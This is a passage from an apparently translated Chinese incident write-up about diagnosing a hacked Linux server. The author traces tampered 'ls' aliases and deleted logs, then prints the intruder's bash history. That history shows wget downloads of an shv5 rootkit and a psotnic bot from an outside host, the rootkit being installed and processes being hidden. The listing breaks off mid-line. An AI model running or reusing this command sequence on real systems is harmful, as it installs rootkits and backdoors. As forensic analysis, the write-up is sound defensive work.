一次服务器被入侵后的分析.docx

最近有个朋友让我去帮他看一下他的Linux服务器，说是Apache启动不了，有很多诡异的情况。后来证明绝不是Apache启动不了这么简单。登上服务器之后随便看了下,最先引起我注意的是”ls”命令的输出：lars@server1:~$?ls???ls:?invalid?option?--?h???Try?`ls?--help?for?more?information.?为什么”ls”默认加了”-h”参数呢?我用”alias”命令看了一下,然后取消了这个别名之后”ls”就工作正常了。lars@server1:~$?alias?ls???alias?ls=ls?-sh?--color=auto???lars@server1:~$?unalias?ls???lars@server1:~$?ls???backup???lars@server1:~$?虽然很奇怪,不过我的首要任务是先把apache启动起来,等过会再仔细研究这个问题。lars@server1:~$?sudo?/etc/init.d/apache2?start???Password:????*?Starting?apache?2.0?web?server...???(2):?apache2:?could?not?open?error?log?file?/var/log/apache2/error.log.???Unable?to?open?logs????...fail!?纳尼?赶紧去”/var/log/”目录一看,果然”apache2/”文件夹不见了.而且这个目录下其他的文件夹,比如”mysql/”,”samba/”也都不见了.一定是哪里出错了.会不会是我朋友不小心删掉了呢,他跟我说绝对没有.然后我用root登录进去准备修复日志丢失的问题。lars@server1:~$?sudo?-i????Password:????root@server1:~#?ls????ls:?unrecognized?prefix:?do????ls:?unparsable?value?for?LS_COLORS?environment?variable????total?44??????4?.?????????????????4?.bashrc???????????4?.ssh??????4?..????????????????4?.lesshst??????????8?.viminfo??????8?.bash_history?????4?.profile??????????4?.vimrc?很不幸的发现,”ls”又出问题了.同样,用”alias”命令：root@server1:~#?alias?ls????alias?ls=ls?-sa?--color=auto????root@server1:~#?unalias?ls????root@server1:~#?ls????root@server1:~#?这个时候,我才意识到问题的严重性.”ls”奇怪的举动和”/var/log/”大量日志被删除让我怀疑服务器是否被入侵了.当我看到root目录下的”.bash_history”时,就已经可以确定被入侵了。root@server1:~#?cat?-n?.bash_history????...????340??w????341??cd?/var????342??wget?50/~matys/pliki/shv5.tar.gz????343??tar?-zxf?shv5.tar.gz????344??rm?-rf?shv5.tar.gz????345??mv?shv5?.x????346??cd?.x????347??./setup?zibi.joe.149?54098????348??passwd????349??passwd????350??ps?aux????351??crontab?-l????352??cat?/etc/issue????353??cat?/etc/passwd????354??w????355??who????356??cd?/usr/lib/libsh????357??ls????358??hide?+????359??chmod?+x?hide????360??hide?+????361??./hide?+????362??cd?/var/.x????363??mkdir?psotnic????364??cd?psotnic????365??wget?50/~matys/pliki/psotnic0.2.5.tar.gz????366??tar?-zxf?psotnic0.2.5.tar.gz????367??rm?-rf?psotnic0.2.5.tar.gz????3